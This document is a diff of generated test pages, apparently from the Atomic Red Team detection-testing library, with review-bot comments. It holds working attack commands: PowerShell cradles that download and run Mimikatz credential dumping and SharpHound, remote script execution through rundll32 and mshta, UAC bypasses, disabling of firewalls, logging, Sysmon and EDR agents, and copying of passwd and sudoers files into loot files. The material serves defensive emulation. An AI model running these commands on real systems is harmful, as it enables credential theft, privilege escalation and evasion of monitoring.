cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
cat /etc/mtab > /tmp/loot.txt
@@ -108,4 +121,7 @@ find . -type f -name ".*"
<br/>
+6 -2
View File
@@ -23,7 +23,8 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
@@ -42,7 +43,6 @@ Consumer = [Ref] $Consumer;
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
#### Cleanup Commands:
```
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
@@ -54,4 +54,8 @@ $EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
<br/>
+36 -12
View File
@@ -29,18 +29,22 @@ Test execution of a remote script using rundll32.exe
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
```
<br/>
<br/>
@@ -52,18 +56,22 @@ Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command for rundll32.exe to execute | string | calc.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
```
<br/>
<br/>
@@ -75,18 +83,22 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
<br/>
<br/>
@@ -98,18 +110,22 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
```
<br/>
<br/>
@@ -121,18 +137,22 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}
```
<br/>
<br/>
@@ -144,16 +164,20 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}
```
<br/>
+98 -31
View File
@@ -49,18 +49,22 @@ Download Mimikatz and dump credentials
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
<br/>
<br/>
@@ -70,18 +74,22 @@ Download Bloodhound and run it
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
<br/>
<br/>
@@ -92,7 +100,8 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
@@ -101,6 +110,9 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
<br/>
<br/>
@@ -110,13 +122,17 @@ Run mimikatz via PsSendKeys
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
<br/>
<br/>
@@ -127,13 +143,17 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
<br/>
<br/>
@@ -143,7 +163,7 @@ Using PS 5.1, add a user via CLI
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | atomic_user|
@@ -151,13 +171,17 @@ Using PS 5.1, add a user via CLI
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
<br/>
<br/>
@@ -169,18 +193,22 @@ Not proxy aware removing cache although does not appear to write to those locati
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
@@ -192,18 +220,22 @@ Not proxy aware removing cache although does not appear to write to those locati
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
@@ -214,18 +246,22 @@ Powershell xml download request
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
<br/>
<br/>
@@ -236,18 +272,22 @@ Powershell invoke mshta to download payload
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
<br/>
<br/>
@@ -258,14 +298,15 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Powershell_ise as a Privileged Account
#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
<br/>
<br/>
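Review bot: the renamed heading for this manual-steps test has swallowed the first step: `#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account` is now a single line, while `2. Invoke-DownloadCradle.ps1` still sits on its own line. The template that renders manual executors appears to have lost the newline after the heading; fix the generator template and regenerate rather than hand-editing the markdown.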
@@ -275,20 +316,24 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
#### Cleanup Commands:
```
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
```
<br/>
<br/>
@@ -298,15 +343,26 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
powershell.exe -version 2 -Command Write-Host $PSVersion
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: PowerShell version 2 must be installed
##### Check Prereq Commands:
```
if(2 -in $PSVersionTable.PSCompatibleVersions.Major){0}else{1}
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
```
<br/>
@@ -318,26 +374,37 @@ Creates a file with an alternate data stream and simulates executing that hidden
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
```
#### Commands to Check Prerequisites:
```
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS"){0}else{1}
```
#### Cleanup Commands:
```
Remove:Item #{ads_file}
```
#### Dependencies: Run with `powershell`!
##### Description: Homedrive must be an NTFS drive
##### Check Prereq Commands:
```
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Prereq's for this test cannot be met automatically
```
<br/>
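Review bot: the cleanup command `Remove:Item #{ads_file}` is a typo (`Remove:Item` is not a cmdlet; `Remove-Item` is), so the file carrying the alternate data stream is never removed after the test; fix `cleanup_command` in the source yaml and regenerate. The old `#### Commands to Check Prerequisites:` block and the new `#### Dependencies:` block both appear in this hunk with the same `Get-Volume` check; confirm the old block is a removed line so the generated page does not show the check twice.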
+18 -4
View File
@@ -203,11 +203,18 @@ atomic_tests:
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
supported_platforms:
- windows
dependencies:
- description: |
PowerShell version 2 must be installed
prereq_command: |
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {0} else {1}
get_prereq_command: |
Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
executor:
name: powershell
elevation_required: false
prereq_command: |
if(2 -in $PSVersionTable.PSCompatibleVersions.Major){0}else{1}
command: |
powershell.exe -version 2 -Command Write-Host $PSVersion
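Review bot: the new dependency's `prereq_command` tests `2 -in $PSVersionTable.PSCompatibleVersions.Major`, but PSCompatibleVersions is a fixed list reported by the running engine and still contains 2.0 on hosts where the Windows PowerShell 2.0 Engine optional feature (and the .NET 2.0/3.5 runtime it needs) has been removed, so the dependency reports satisfied and the attack command then fails to start. A check that exercises the actual dependency is more reliable, for example launching `powershell.exe -version 2 -NoProfile -Command exit` and returning 0 only when `$LASTEXITCODE -eq 0`, or querying the MicrosoftWindowsPowerShellV2 optional feature where elevation is available.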
@@ -221,11 +228,18 @@ atomic_tests:
description: File created to store Alternate Stream Data
type: String
default: $env:TEMP\NTFS_ADS.txt
dependencies:
- description: |
Homedrive must be an NTFS drive
prereq_command: |
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {0} else {1}
get_prereq_command: |
Write-Host Prereq's for this test cannot be met automatically
executor:
name: powershell
elevation_required: false
prereq_command: | # Checks to verify that $env:HOMEDRIVE is an NTFS drive
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS"){0}else{1}
command: |
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
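Review bot: the moved prereq check relies on `Get-Volume`, which comes from the Storage module (Windows 8 / Server 2012 and later), so on older supported Windows versions the dependency check throws instead of returning 1; `(New-Object System.IO.DriveInfo "$env:HOMEDRIVE\").DriveFormat -eq "NTFS"` works on every .NET Framework version and also replaces the `-contains` comparison against a scalar string with the `-eq` that is actually meant. The yaml comment explaining the check is dropped in the move, which is fine since the new `description` carries it.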
+59 -15
@@ -57,18 +57,22 @@ Enumerate all accounts by copying /etc/passwd to another file
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cat /etc/passwd > #{output_file}
```
<br/>
<br/>
@@ -78,18 +82,22 @@ cat /etc/passwd > #{output_file}
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cat /etc/sudoers > #{output_file}
```
<br/>
<br/>
@@ -99,18 +107,22 @@ View accounts wtih UID 0
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
```
<br/>
<br/>
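Review bot: typo in the test description carried in this hunk's header: `View accounts wtih UID 0` should read `with`; fix it in the T1087 yaml description since the markdown is generated from it.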
@@ -120,13 +132,17 @@ List opened files by user
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
<br/>
<br/>
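Review bot: `username=$(echo $HOME | awk -F'/' '{print $3}')` derives the account name from the home directory path and yields an empty string for root (`/root`) or any account whose home is not exactly two levels deep, so the `lsof -u` call then runs with a missing argument; `lsof -u "$(id -un)"` (or `$USER`) is robust on both Linux and macOS.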
@@ -136,18 +152,22 @@ Show if a user account has ever logger in remotely
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
lastlog > #{output_file}
```
<br/>
<br/>
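Review bot: typo in the description in this hunk's header: `has ever logger in remotely` should read `logged in`; fix it in the yaml since the markdown is generated.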
@@ -157,7 +177,8 @@ Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
groups
id
@@ -165,6 +186,9 @@ id
<br/>
<br/>
@@ -174,7 +198,8 @@ Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
dscl . list /Groups
dscl . list /Users
@@ -185,6 +210,9 @@ dscacheutil -q user
<br/>
<br/>
@@ -194,7 +222,8 @@ Enumerate all accounts
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net user
net user /domain
@@ -206,6 +235,9 @@ net localgroup
<br/>
<br/>
@@ -215,7 +247,8 @@ Enumerate all accounts via PowerShell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
net user
net user /domain
@@ -232,6 +265,9 @@ net localgroup
<br/>
<br/>
@@ -241,13 +277,17 @@ Enumerate logged on users
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
query user
```
<br/>
<br/>
@@ -257,11 +297,15 @@ Enumerate logged on users via PowerShell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
query user
```
<br/>
+42 -18
@@ -33,23 +33,27 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
#### Cleanup Commands:
```
reg.exe delete hkcu\software\classes\mscfile /f
```
<br/>
<br/>
@@ -59,24 +63,28 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```
#### Cleanup Commands:
```
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
```
<br/>
<br/>
@@ -86,24 +94,28 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
```
#### Cleanup Commands:
```
reg.exe delete hkcu\software\classes\ms-settings /f
```
<br/>
<br/>
@@ -113,12 +125,13 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
@@ -126,12 +139,15 @@ Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "
Start-Process "C:\Windows\System32\fodhelper.exe"
```
#### Cleanup Commands:
```
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
```
<br/>
<br/>
@@ -141,12 +157,13 @@ PowerShell code to bypass User Account Control using ComputerDefaults.exe on Win
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
@@ -154,12 +171,15 @@ Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
```
#### Cleanup Commands:
```
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
```
<br/>
<br/>
@@ -169,23 +189,27 @@ Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC by
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
mkdir "\\?\C:\Windows \System32\"
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
```
#### Cleanup Commands:
```
rd "\\?\C:\Windows \" /S /Q
del "c:\testbypass.exe"
```
<br/>
+125 -37
@@ -43,7 +43,8 @@ Disables the iptables firewall
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
@@ -59,6 +60,9 @@ fi
<br/>
<br/>
@@ -68,7 +72,8 @@ Disables syslog collection
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
@@ -82,6 +87,9 @@ fi
<br/>
<br/>
@@ -91,7 +99,8 @@ Disable the Cb Response service
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
@@ -105,6 +114,9 @@ fi
<br/>
<br/>
@@ -114,13 +126,17 @@ Disables SELinux enforcement
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
setenforce 0
```
<br/>
<br/>
@@ -130,13 +146,17 @@ Disables Carbon Black Response
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
<br/>
<br/>
@@ -146,13 +166,17 @@ Disables LittleSnitch
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
<br/>
<br/>
@@ -162,13 +186,17 @@ Disables OpenDNS Umbrella
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
<br/>
<br/>
@@ -178,21 +206,17 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
fltmc.exe unload #{sysmon_driver}
```
#### Commands to Check Prerequisites:
```
fltmc.exe filters | findstr #{sysmon_driver}
```
#### Cleanup Commands:
```
sc stop sysmon
@@ -200,6 +224,21 @@ fltmc.exe load #{sysmon_driver}
sc start sysmon
```
#### Dependencies: Run with `command_prompt`!
##### Description: Sysmon filter must be loaded
##### Check Prereq Commands:
```
fltmc.exe filters | findstr #{sysmon_driver}
```
##### Get Prereq Commands:
```
echo Automated installer not implemented yet, please install Sysmon manually
```
<br/>
<br/>
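Review bot: the new dependency check `fltmc.exe filters | findstr #{sysmon_driver}` needs an elevated prompt (fltmc refuses to enumerate filters for a standard user with "Access is denied", and findstr then exits 1), so on an unelevated run the dependency reports unmet even when Sysmon is loaded; the Dependencies header should carry the same "Elevation Required" marker as the attack command, or the framework should run dependency checks with the executor's `elevation_required` setting. The Get Prereq Commands only echo a message, so a run that reaches them can never satisfy the prerequisite; that is acceptable as long as the framework treats a still-failing recheck as a stop rather than continuing to `fltmc.exe unload`.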
@@ -210,26 +249,26 @@ This action requires HTTP logging configurations in IIS to be unlocked.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
#### Commands to Check Prerequisites:
```
if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
```
#### Cleanup Commands:
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
```
<br/>
<br/>
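Review bot: `appcmd.exe set config ... /section:httplogging /dontLog:true` writes to applicationHost.config and requires an administrator prompt, but the Attack Commands header here lacks the "Elevation Required" marker that the other privileged tests in this file carry; set `elevation_required: true` in the yaml so the generated header matches what the command actually needs.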
